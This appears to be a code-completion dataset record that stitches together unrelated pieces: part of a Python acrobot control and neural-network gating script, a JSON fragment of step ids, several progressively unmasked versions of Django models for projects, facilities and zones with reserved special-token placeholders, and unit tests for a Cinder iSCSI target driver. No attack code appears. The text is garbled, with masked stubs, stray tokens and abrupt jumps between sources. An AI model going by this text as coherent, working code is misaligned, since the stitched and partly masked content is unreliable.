np.zeros((num_trials, 4), dtype=np.float32)\nY = np.zeros((num_trials, 1), dtype=np.float32)\n\nth1_min = pi / 2 - .5\nth1_max = pi / 2 + .5\nth2_min = -1\nth2_max = 1\nth1dot_min = -5\nth1dot_max = 5\nth2dot_min = -10\nth2dot_max = 10\n\nsamples = np.random.random_sample((int(num_trials/2), 4))\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min - th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\n\ntotal_steps = 0\npool = Pool() # defaults to number of available CPU's\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(num_trials/2))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i, :] = samples[i, :]\n Y[i] = sum(rews) > env.num_steps*3 - 10\n\n\nth1_min = 0\nth1_max = 2*pi\nth2_min = -pi\nth2_max = pi\nth1dot_min = -10\nth1dot_max = 10\nth2dot_min = -30\nth2dot_max = 30\n\nsamples = np.random.random_sample((int(num_trials/2), 4))\nsamples *= 
np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min - th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\ntotal_steps = 0\n\n\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(num_trials/2), int(num_trials))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i+int(num_trials/2), :] = samples[i, :]\n Y[i+int(num_trials/2)] = sum(rews) > env.num_steps*3 - 5\n\n\nprint(time.time() - start)\n\n# %%\nfrom seagul.nn import MLP, fit_model\nimport torch\n\nnet = MLP(4, 1, 2, 32) # output_activation=torch.nn.Softmax)\nY0 = np.ones((num_trials, 1), dtype=np.float32)\n\nw = 1e-2\nclass_weight = torch.tensor(Y.shape[0]/sum(Y)*w, dtype=torch.float32)\n\nloss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss(pos_weight=class_weight))\n#loss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss())\n\n# loss_hist = fit_model(net, X, Y, 100, batch_size=2048)\n# loss_hist = fit_model(net, X, Y0, 5, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss(pos_weight=class_weight))\n\nplt.close()\nplt.plot(loss_hist)\nplt.show()\n\n# %%\n\n\nn_thdot = 1\nn_th = 1000\n\nth1_vals = np.linspace(0, 2*pi, n_th)\nth2_vals = np.linspace(-pi, pi, n_th)\n\nth1dot_vals = np.linspace(-10, 10, n_th)\nth2dot_vals = np.linspace(-30, 30, n_th)\n\nsig = torch.nn.Sigmoid()\n\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\n\nfrom itertools import product\n\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])\n\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\n\nend = time.time()\n\nprint(end - start)\n\nfig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\n# generate 2 2d grids for the x & y bounds\nx, y = np.meshgrid(th1_vals, th2_vals)\nz = preds\n\n# x and y are bounds, so z should be the value *inside* those bounds.\n# 
Therefore, remove the last value from the z array.\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\n\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)\nax.set_title('Theta')\nax.set_xlabel('Th1')\nax.set_ylabel('Th2')\n\n# set the limits of the plot to the limits of the data\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\n\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\n\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([pi/2, 0, th1dot_vals[i], th2dot_vals[j]])\n\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\nend = time.time()\n\nprint(end - start)\n\nfig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\n# generate 2 2d grids for the x & y bounds\nx, y = np.meshgrid(th1dot_vals, th2dot_vals)\nz = preds\n\n# x and y are bounds, so z should be the value *inside* those bounds.\n# Therefore, remove the last value from the z array.\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\n\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)\nax.set_title('DTheta')\nax.set_xlabel('dth1')\nax.set_ylabel('dth2')\n# set the limits of the plot to the limits of the data\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\n\n\n# %%\n\ntorch.set_default_dtype(torch.float32)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n return reward, False\n\n\ndef do_rollout(trial_num):\n np.random.seed(trial_num)\n act_hold = 20\n hold_count = 0\n\n obs = env.reset()\n local_lqr = False\n\n actions = np.random.randn(1) * 3\n\n local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0]))\n local_reward_hist = np.zeros((env.num_steps, 1))\n local_gate_hist = np.zeros((env.num_steps, 1))\n local_action_hist = np.zeros((env.num_steps, 1))\n\n for i in range(env.num_steps):\n obs = np.array(obs, dtype=np.float32)\n if sig(net(obs)) > .85:\n actions = 
np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n local_lqr = True\n local_gate_hist[i] = 1\n else:\n local_gate_hist[i] = 0\n if hold_count == act_hold:\n actions = np.random.randn(1) * 3\n hold_count = 0\n\n hold_count += 1\n obs, reward, done, _ = env.step(actions)\n local_action_hist[i, :] = np.copy(actions)\n local_state_hist[i, :] = np.copy(obs)\n local_reward_hist[i, :] = np.copy(reward)\n\n return local_action_hist, local_state_hist, local_reward_hist, local_gate_hist, local_lqr\n\n\nconfig = {\"init_state\": [-pi / 2, 0, 0, 0],\n \"max_torque\": max_torque,\n \"init_state_weights\": [1, 1, 5, 5],\n \"dt\": dt,\n \"m2\": m2,\n \"m1\": m1,\n \"l1\": l1,\n \"lc1\": lc1,\n \"lc2\": lc2,\n \"i1\": I1,\n \"i2\": I2,\n \"integrator\" : integrator,\n \"reward_fn\": reward_fn,\n \"act_hold\": 1,\n \"max_t\" : 10\n }\n\nenv = gym.make('su_acrobot-v0', **config)\n\nnum_trials = 1000\naction_hist = np.zeros((num_trials, env.num_steps, 1))\nstate_hist = np.zeros((num_trials, env.num_steps, env.observation_space.shape[0]))\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\ngate_hist = np.zeros((num_trials, env.num_steps, 1))\nerr_hist = np.zeros((num_trials, 1))\n\nlqr_list = []\nsuccess_list = []\n\nact_hold = 20\nhold_count = 0\nobs = env.reset()\n\nstart = time.time()\n\npool = Pool() # defaults to number of available CPU's\nfor i, res in enumerate(pool.imap(do_rollout,range(num_trials))):\n acts, obs, rews, gate, lqr_on = res\n action_hist[i, :, :] = acts\n state_hist[i, :, :] = obs\n reward_hist[i, :, :] = rews\n gate_hist[i, :, :] = gate\n err_hist[i] = (np.sqrt(sum(((state_hist[i, -1, :] - np.array([pi / 2, 0, 0, 0])) ** 2))))\n if lqr_on:\n lqr_list.append(i)\n #print(err_hist[i])\n #print(reward_hist[i,-1])\n if err_hist[i] < 2:\n success_list.append(i)\n\n#\n# for i in (range(num_trials)):\n# res = do_rollout(i)\n# acts, obs, rews, gate, lqr_on = res\n# action_hist[i, :, :] = acts\n# state_hist[i, :, :] = obs\n# reward_hist[i, :, :] = rews\n# 
gate_hist[i, :, :] = gate\n# err_hist[i] = (np.sqrt(sum(((state_hist[i, -1, :] - np.array([pi / 2, 0, 0, 0])) ** 2))))\n# if lqr_on:\n# lqr_list.append(i)\n# #print(err_hist[i])\n# #print(reward_hist[i,-1])\n# if err_hist[i] < 2:\n# success_list.append(i)\n\n\nprint(len(lqr_list))\nprint(len(success_list))\n\nprint((time.time() - global_start) / 60)\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class Facility(models.Model):
facility_id = models.IntegerField(primary_key=True)
facility_name = models.CharField(max_length=50)
facility_description = models.CharField(max_length=100, blank=True,
null=True)
project = models.ForeignKey('Project', models.DO_NOTHING, null=True)
locked_for_edit = models.BooleanField(blank=True, null=True)
class Meta:
db_table = 'facility'
managed = True
class Zone(models.Model):
zone_id = models.AutoField(primary_key=True)
zone_name = models.CharField(max_length=20)
zone_description = models.CharField(max_length=100, blank=True, null=True)
facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)
class Meta:
db_table = 'zone'
managed = True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Project(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
db_table = 'project'
managed = True
class Facility(models.Model):
facility_id = models.IntegerField(primary_key=True)
facility_name = models.CharField(max_length=50)
facility_description = models.CharField(max_length=100, blank=True,
null=True)
project = models.ForeignKey('Project', models.DO_NOTHING, null=True)
locked_for_edit = models.BooleanField(blank=True, null=True)
class Meta:
db_table = 'facility'
managed = True
class Zone(models.Model):
zone_id = models.AutoField(primary_key=True)
zone_name = models.CharField(max_length=20)
zone_description = models.CharField(max_length=100, blank=True, null=True)
facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)
class Meta:
db_table = 'zone'
managed = True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Project(models.Model):
project_id = models.IntegerField(primary_key=True)
project_name = models.CharField(max_length=50)
project_description = models.CharField(max_length=200, blank=True, null
=True)
project_address = models.CharField(max_length=100, blank=True, null=True)
project_city = models.CharField(max_length=50, blank=True, null=True)
project_pincode = models.CharField(max_length=10, blank=True, null=True)
project_status = models.CharField(max_length=10, blank=True, null=True)
class Meta:
db_table = 'project'
managed = True
class Facility(models.Model):
facility_id = models.IntegerField(primary_key=True)
facility_name = models.CharField(max_length=50)
facility_description = models.CharField(max_length=100, blank=True,
null=True)
project = models.ForeignKey('Project', models.DO_NOTHING, null=True)
locked_for_edit = models.BooleanField(blank=True, null=True)
class Meta:
db_table = 'facility'
managed = True
class Zone(models.Model):
zone_id = models.AutoField(primary_key=True)
zone_name = models.CharField(max_length=20)
zone_description = models.CharField(max_length=100, blank=True, null=True)
facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)
class Meta:
db_table = 'zone'
managed = True
<|reserved_special_token_1|>
from django.db import models
from django.db import models
class Project(models.Model):
project_id = models.IntegerField(primary_key=True)
project_name = models.CharField(max_length=50)
project_description = models.CharField(max_length=200, blank=True, null
=True)
project_address = models.CharField(max_length=100, blank=True, null=True)
project_city = models.CharField(max_length=50, blank=True, null=True)
project_pincode = models.CharField(max_length=10, blank=True, null=True)
project_status = models.CharField(max_length=10, blank=True, null=True)
class Meta:
db_table = 'project'
managed = True
class Facility(models.Model):
facility_id = models.IntegerField(primary_key=True)
facility_name = models.CharField(max_length=50)
facility_description = models.CharField(max_length=100, blank=True,
null=True)
project = models.ForeignKey('Project', models.DO_NOTHING, null=True)
locked_for_edit = models.BooleanField(blank=True, null=True)
class Meta:
db_table = 'facility'
managed = True
class Zone(models.Model):
zone_id = models.AutoField(primary_key=True)
zone_name = models.CharField(max_length=20)
zone_description = models.CharField(max_length=100, blank=True, null=True)
facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)
class Meta:
db_table = 'zone'
managed = True
<|reserved_special_token_1|>
from django.db import models
# Create your models here.
from django.db import models
# Create your models here.
class Project(models.Model):
project_id = models.IntegerField(primary_key=True)
project_name = models.CharField(max_length=50)
project_description = models.CharField(max_length=200, blank=True, null=True)
project_address = models.CharField(max_length=100, blank=True, null=True)
project_city = models.CharField(max_length=50, blank=True, null=True)
project_pincode = models.CharField(max_length=10, blank=True, null=True)
project_status = models.CharField(max_length=10, blank=True, null=True)
class Meta:
db_table = 'project'
managed = True
class Facility(models.Model):
facility_id = models.IntegerField(primary_key=True)
facility_name = models.CharField(max_length=50)
facility_description = models.CharField(max_length=100, blank=True, null=True)
project = models.ForeignKey('Project', models.DO_NOTHING, null=True)
locked_for_edit = models.BooleanField(blank=True, null=True)
class Meta:
db_table = 'facility'
managed = True
class Zone(models.Model):
zone_id = models.AutoField(primary_key=True)
zone_name = models.CharField(max_length=20)
zone_description = models.CharField(max_length=100, blank=True, null=True)
facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)
class Meta:
db_table = 'zone'
managed = True
|
flexible
|
{
"blob_id": "2783fc24806c323ab4ac44fbac55eef73142ab80",
"index": 7710,
"step-1": "<mask token>\n\n\nclass Facility(models.Model):\n facility_id = models.IntegerField(primary_key=True)\n facility_name = models.CharField(max_length=50)\n facility_description = models.CharField(max_length=100, blank=True,\n null=True)\n project = models.ForeignKey('Project', models.DO_NOTHING, null=True)\n locked_for_edit = models.BooleanField(blank=True, null=True)\n\n\n class Meta:\n db_table = 'facility'\n managed = True\n\n\nclass Zone(models.Model):\n zone_id = models.AutoField(primary_key=True)\n zone_name = models.CharField(max_length=20)\n zone_description = models.CharField(max_length=100, blank=True, null=True)\n facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)\n\n\n class Meta:\n db_table = 'zone'\n managed = True\n",
"step-2": "<mask token>\n\n\nclass Project(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'project'\n managed = True\n\n\nclass Facility(models.Model):\n facility_id = models.IntegerField(primary_key=True)\n facility_name = models.CharField(max_length=50)\n facility_description = models.CharField(max_length=100, blank=True,\n null=True)\n project = models.ForeignKey('Project', models.DO_NOTHING, null=True)\n locked_for_edit = models.BooleanField(blank=True, null=True)\n\n\n class Meta:\n db_table = 'facility'\n managed = True\n\n\nclass Zone(models.Model):\n zone_id = models.AutoField(primary_key=True)\n zone_name = models.CharField(max_length=20)\n zone_description = models.CharField(max_length=100, blank=True, null=True)\n facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)\n\n\n class Meta:\n db_table = 'zone'\n managed = True\n",
"step-3": "<mask token>\n\n\nclass Project(models.Model):\n project_id = models.IntegerField(primary_key=True)\n project_name = models.CharField(max_length=50)\n project_description = models.CharField(max_length=200, blank=True, null\n =True)\n project_address = models.CharField(max_length=100, blank=True, null=True)\n project_city = models.CharField(max_length=50, blank=True, null=True)\n project_pincode = models.CharField(max_length=10, blank=True, null=True)\n project_status = models.CharField(max_length=10, blank=True, null=True)\n\n\n class Meta:\n db_table = 'project'\n managed = True\n\n\nclass Facility(models.Model):\n facility_id = models.IntegerField(primary_key=True)\n facility_name = models.CharField(max_length=50)\n facility_description = models.CharField(max_length=100, blank=True,\n null=True)\n project = models.ForeignKey('Project', models.DO_NOTHING, null=True)\n locked_for_edit = models.BooleanField(blank=True, null=True)\n\n\n class Meta:\n db_table = 'facility'\n managed = True\n\n\nclass Zone(models.Model):\n zone_id = models.AutoField(primary_key=True)\n zone_name = models.CharField(max_length=20)\n zone_description = models.CharField(max_length=100, blank=True, null=True)\n facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)\n\n\n class Meta:\n db_table = 'zone'\n managed = True\n",
"step-4": "from django.db import models\nfrom django.db import models\n\n\nclass Project(models.Model):\n project_id = models.IntegerField(primary_key=True)\n project_name = models.CharField(max_length=50)\n project_description = models.CharField(max_length=200, blank=True, null\n =True)\n project_address = models.CharField(max_length=100, blank=True, null=True)\n project_city = models.CharField(max_length=50, blank=True, null=True)\n project_pincode = models.CharField(max_length=10, blank=True, null=True)\n project_status = models.CharField(max_length=10, blank=True, null=True)\n\n\n class Meta:\n db_table = 'project'\n managed = True\n\n\nclass Facility(models.Model):\n facility_id = models.IntegerField(primary_key=True)\n facility_name = models.CharField(max_length=50)\n facility_description = models.CharField(max_length=100, blank=True,\n null=True)\n project = models.ForeignKey('Project', models.DO_NOTHING, null=True)\n locked_for_edit = models.BooleanField(blank=True, null=True)\n\n\n class Meta:\n db_table = 'facility'\n managed = True\n\n\nclass Zone(models.Model):\n zone_id = models.AutoField(primary_key=True)\n zone_name = models.CharField(max_length=20)\n zone_description = models.CharField(max_length=100, blank=True, null=True)\n facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)\n\n\n class Meta:\n db_table = 'zone'\n managed = True\n",
"step-5": "from django.db import models\n\n# Create your models here.\nfrom django.db import models\n\n# Create your models here.\nclass Project(models.Model):\n project_id = models.IntegerField(primary_key=True)\n project_name = models.CharField(max_length=50)\n project_description = models.CharField(max_length=200, blank=True, null=True)\n project_address = models.CharField(max_length=100, blank=True, null=True)\n project_city = models.CharField(max_length=50, blank=True, null=True)\n project_pincode = models.CharField(max_length=10, blank=True, null=True)\n project_status = models.CharField(max_length=10, blank=True, null=True)\n\n class Meta:\n db_table = 'project'\n managed = True\n\n\n\nclass Facility(models.Model):\n facility_id = models.IntegerField(primary_key=True)\n facility_name = models.CharField(max_length=50)\n facility_description = models.CharField(max_length=100, blank=True, null=True)\n project = models.ForeignKey('Project', models.DO_NOTHING, null=True)\n locked_for_edit = models.BooleanField(blank=True, null=True)\n\n class Meta:\n db_table = 'facility'\n managed = True\n\n\n\nclass Zone(models.Model):\n zone_id = models.AutoField(primary_key=True)\n zone_name = models.CharField(max_length=20)\n zone_description = models.CharField(max_length=100, blank=True, null=True)\n facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)\n\n class Meta:\n db_table = 'zone'\n managed = True\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class TestIetAdmDriver(tf.TargetDriverFixture):
<|reserved_special_token_0|>
def test_get_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual('1', self.target._get_target(
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
))
mock_open.side_effect = MemoryError()
self.assertRaises(MemoryError, self.target._get_target, '')
<|reserved_special_token_0|>
@mock.patch('cinder.utils.execute')
@mock.patch('os.path.exists', return_value=True)
def test_update_config_file_failure(self, mock_exists, mock_execute):
mock_exists.return_value = False
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed, self.target.
update_config_file, self.test_vol, 0, self.fake_volumes_dir,
'foo bar')
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestIetAdmDriver(tf.TargetDriverFixture):
def setUp(self):
super(TestIetAdmDriver, self).setUp()
self.target = iet.IetAdm(root_helper=utils.get_root_helper(),
configuration=self.configuration)
def test_get_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual('1', self.target._get_target(
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
))
mock_open.side_effect = MemoryError()
self.assertRaises(MemoryError, self.target._get_target, '')
<|reserved_special_token_0|>
@mock.patch('cinder.utils.execute')
@mock.patch('os.path.exists', return_value=True)
def test_update_config_file_failure(self, mock_exists, mock_execute):
mock_exists.return_value = False
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed, self.target.
update_config_file, self.test_vol, 0, self.fake_volumes_dir,
'foo bar')
<|reserved_special_token_0|>
@mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',
return_value=None)
@mock.patch('os.path.exists', return_value=False)
@mock.patch('cinder.utils.execute')
def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):
self.target.remove_iscsi_target(1, 0, self.testvol['id'], self.
testvol['name'])
mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',
run_as_root=True)
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetRemoveFailed, self.target.
remove_iscsi_target, 1, 0, self.testvol['id'], self.testvol['name']
)
def test_find_sid_cid_for_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual(('844427031282176', '0'), self.target.
_find_sid_cid_for_target('1',
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
, 'volume-83c2e877-feed-46be-8435-77884fe55b45'))
<|reserved_special_token_0|>
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',
return_value=None)
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)
def test_ensure_export(self, mock_get_targetm, mock_get_chap):
ctxt = context.get_admin_context()
with mock.patch.object(self.target, 'create_iscsi_target'):
self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir
)
self.target.create_iscsi_target.assert_called_once_with(
'iqn.2010-10.org.openstack:testvol', 1, 0, self.
fake_volumes_dir, None, portals_ips=[self.configuration.
iscsi_ip_address], portals_port=int(self.configuration.
iscsi_port), check_exit_code=False, old_name=None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestIetAdmDriver(tf.TargetDriverFixture):
def setUp(self):
super(TestIetAdmDriver, self).setUp()
self.target = iet.IetAdm(root_helper=utils.get_root_helper(),
configuration=self.configuration)
def test_get_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual('1', self.target._get_target(
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
))
mock_open.side_effect = MemoryError()
self.assertRaises(MemoryError, self.target._get_target, '')
<|reserved_special_token_0|>
@mock.patch('cinder.utils.execute')
@mock.patch('os.path.exists', return_value=True)
def test_update_config_file_failure(self, mock_exists, mock_execute):
mock_exists.return_value = False
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed, self.target.
update_config_file, self.test_vol, 0, self.fake_volumes_dir,
'foo bar')
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)
@mock.patch('cinder.utils.execute')
def test_create_iscsi_target_already_exists(self, mock_execute,
mock_get_targ):
mock_execute.return_value = 'fake out', 'fake err'
self.assertEqual(1, self.target.create_iscsi_target(self.test_vol,
1, 0, self.fake_volumes_dir))
self.assertTrue(mock_get_targ.called)
self.assertTrue(mock_execute.called)
@mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',
return_value=None)
@mock.patch('os.path.exists', return_value=False)
@mock.patch('cinder.utils.execute')
def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):
self.target.remove_iscsi_target(1, 0, self.testvol['id'], self.
testvol['name'])
mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',
run_as_root=True)
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetRemoveFailed, self.target.
remove_iscsi_target, 1, 0, self.testvol['id'], self.testvol['name']
)
def test_find_sid_cid_for_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual(('844427031282176', '0'), self.target.
_find_sid_cid_for_target('1',
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
, 'volume-83c2e877-feed-46be-8435-77884fe55b45'))
<|reserved_special_token_0|>
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',
return_value=None)
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)
def test_ensure_export(self, mock_get_targetm, mock_get_chap):
ctxt = context.get_admin_context()
with mock.patch.object(self.target, 'create_iscsi_target'):
self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir
)
self.target.create_iscsi_target.assert_called_once_with(
'iqn.2010-10.org.openstack:testvol', 1, 0, self.
fake_volumes_dir, None, portals_ips=[self.configuration.
iscsi_ip_address], portals_port=int(self.configuration.
iscsi_port), check_exit_code=False, old_name=None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestIetAdmDriver(tf.TargetDriverFixture):
    """Unit tests for the IET (iSCSI Enterprise Target) driver IetAdm."""

    # Canonical fake volume name / IQN shared by the proc-file parsing tests.
    _VOLUME_NAME = 'volume-83c2e877-feed-46be-8435-77884fe55b45'
    _IQN = 'iqn.2010-10.org.openstack:' + _VOLUME_NAME
    # A single session entry as rendered by the IET proc session file.
    _PROC_SESSION = (
        'tid:1 name:' + _IQN + '\n'
        ' sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n'
        ' cid:0 ip:10.9.8.7 state:active hd:none dd:none')

    def setUp(self):
        super(TestIetAdmDriver, self).setUp()
        # Driver under test, wired to the shared fixture configuration.
        self.target = iet.IetAdm(root_helper=utils.get_root_helper(),
                                 configuration=self.configuration)

    def _fake_session_file(self):
        """Return a seekable file-like stand-in for the IET session file."""
        fake = six.StringIO()
        fake.write(self._PROC_SESSION)
        fake.seek(0)
        return fake

    def test_get_target(self):
        """_get_target resolves an IQN to its tid via the session file."""
        with mock.patch('six.moves.builtins.open') as mock_open:
            mock_open.return_value = contextlib.closing(
                self._fake_session_file())
            self.assertEqual('1', self.target._get_target(self._IQN))

            # Failure path: errors while reading the session file propagate.
            mock_open.side_effect = MemoryError()
            self.assertRaises(MemoryError, self.target._get_target, '')

    @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',
                return_value=0)
    @mock.patch('cinder.utils.execute')
    @mock.patch('os.path.exists', return_value=True)
    @mock.patch('cinder.utils.temporary_chown')
    @mock.patch.object(iet, 'LOG')
    def test_create_iscsi_target(self, mock_log, mock_chown, mock_exists,
                                 mock_execute, mock_get_targ):
        """Creation succeeds, and config/auth failures raise CreateFailed."""
        mock_execute.return_value = ('', '')
        conf_file = six.StringIO()
        with mock.patch('six.moves.builtins.open') as mock_open:
            mock_open.return_value = contextlib.closing(conf_file)
            tid = self.target.create_iscsi_target(self.test_vol, 0, 0,
                                                  self.fake_volumes_dir)
            self.assertEqual(0, tid)
            self.assertTrue(mock_execute.called)
            self.assertTrue(mock_open.called)
            self.assertTrue(mock_get_targ.called)

            # Failure path: opening/chowning the config file blows up.
            mock_open.side_effect = putils.ProcessExecutionError
            self.assertRaises(exception.ISCSITargetCreateFailed,
                              self.target.create_iscsi_target,
                              self.test_vol, 0, 0, self.fake_volumes_dir)

            # Failure path: ietadm refuses to set the new auth.
            mock_execute.side_effect = putils.ProcessExecutionError
            self.assertRaises(exception.ISCSITargetCreateFailed,
                              self.target.create_iscsi_target,
                              self.test_vol, 0, 0, self.fake_volumes_dir)

    @mock.patch('cinder.utils.execute')
    @mock.patch('os.path.exists', return_value=True)
    def test_update_config_file_failure(self, mock_exists, mock_execute):
        """A missing conf file plus a failing copy raises CreateFailed."""
        mock_exists.return_value = False
        mock_execute.side_effect = putils.ProcessExecutionError
        self.assertRaises(exception.ISCSITargetCreateFailed,
                          self.target.update_config_file,
                          self.test_vol, 0, self.fake_volumes_dir, "foo bar")

    @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',
                return_value=1)
    @mock.patch('cinder.utils.execute')
    def test_create_iscsi_target_already_exists(self, mock_execute,
                                                mock_get_targ):
        """Re-creating an existing target reuses the tid already assigned."""
        mock_execute.return_value = ('fake out', 'fake err')
        tid = self.target.create_iscsi_target(self.test_vol, 1, 0,
                                              self.fake_volumes_dir)
        self.assertEqual(1, tid)
        self.assertTrue(mock_get_targ.called)
        self.assertTrue(mock_execute.called)

    @mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',
                return_value=None)
    @mock.patch('os.path.exists', return_value=False)
    @mock.patch('cinder.utils.execute')
    def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):
        """Removal sends an ietadm delete and maps errors to RemoveFailed."""
        # Happy path: the delete op is issued for the right tid, as root.
        self.target.remove_iscsi_target(1, 0, self.testvol['id'],
                                        self.testvol['name'])
        mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',
                                     run_as_root=True)

